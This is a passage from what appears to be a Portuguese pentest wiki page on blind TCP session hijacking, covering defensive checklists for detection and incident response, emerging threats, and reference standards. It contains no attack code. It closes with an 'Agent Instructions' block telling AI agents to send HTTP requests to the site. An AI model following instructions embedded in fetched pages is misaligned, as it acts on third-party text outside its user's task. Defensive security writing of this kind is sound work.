**Monitoramento de Rede** * [ ] Análise de sequence numbers * [ ] Detecção de RST storms * [ ] Monitoramento de window size anomalies * [ ] Análise de padrões de tráfego * [ ] **Ferramentas IDS/IPS** * [ ] Regras para blind hijacking * [ ] Alertas para sequence prediction * [ ] Detecção de injection attempts * [ ] Correlation de eventos ### **Checklist de Resposta** * [ ] **Plano de Resposta a Incidentes** * [ ] Procedimentos para invalidar sessões * [ ] Comunicação com usuários afetados * [ ] Análise forense de logs * [ ] Atualização de regras de detecção *** ## **⚠️ Considerações Finais** ### **Tendências e Futuro** ```yaml emerging_threats: quantum_computing: - "Quebra de geração atual de ISN" - "Necessidade de algoritmos pós-quânticos" iot_vulnerabilities: - "Dispositivos com stacks TCP/IP fracos" - "Falta de atualizações de segurança" cloud_challenges: - "Session hijacking entre tenants" - "Complexidade em ambientes containerizados" ``` ### **Recomendações Estratégicas** 1. **Defesa em Profundidade**: Múltiplas camadas de proteção 2. **Monitoramento Contínuo**: Detecção em tempo real 3. **Hardening de Sistemas**: Configurações seguras por padrão 4. **Educação e Conscientização**: Treinamento de equipes ### **Recursos Recomendados** * **RFC 6528**: Defending Against Sequence Number Attacks * **CIS Benchmarks**: Configurações seguras de rede * **NIST Guidelines**: Segurança em protocolos de rede * **OWASP**: Proteções em nível de aplicação **🔐 Lembre-se**: Blind TCP Session Hijacking é uma ameaça complexa que requer compreensão profunda de protocolos de rede. A combinação de configurações seguras, monitoramento proativo e resposta rápida é essencial para proteção eficaz. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/rede-and-infraestrutura/tcp/blind-tcp-session-hijacking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.